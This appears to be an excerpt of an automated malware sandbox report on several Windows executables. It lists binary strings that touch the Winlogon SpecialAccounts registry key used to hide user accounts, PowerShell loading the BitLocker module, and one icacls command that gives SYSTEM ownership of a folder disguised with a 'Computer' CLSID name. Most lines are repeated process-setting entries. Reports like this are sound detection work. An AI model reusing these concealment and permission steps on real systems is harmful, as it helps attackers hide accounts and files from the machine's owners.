                    Source: jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
                    Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
                    Source: main.exe, 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: main.exe, 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
                    Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: main.exe, 0000001F.00000002.2937124529.00007FFE116C4000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                    Source: main.exe, 0000001F.00000002.2937124529.00007FFE116C4000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\jvnu3e85o6ls9huft0apy3731vg.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                    Source: C:\Users\user\Desktop\80P.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\80P.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
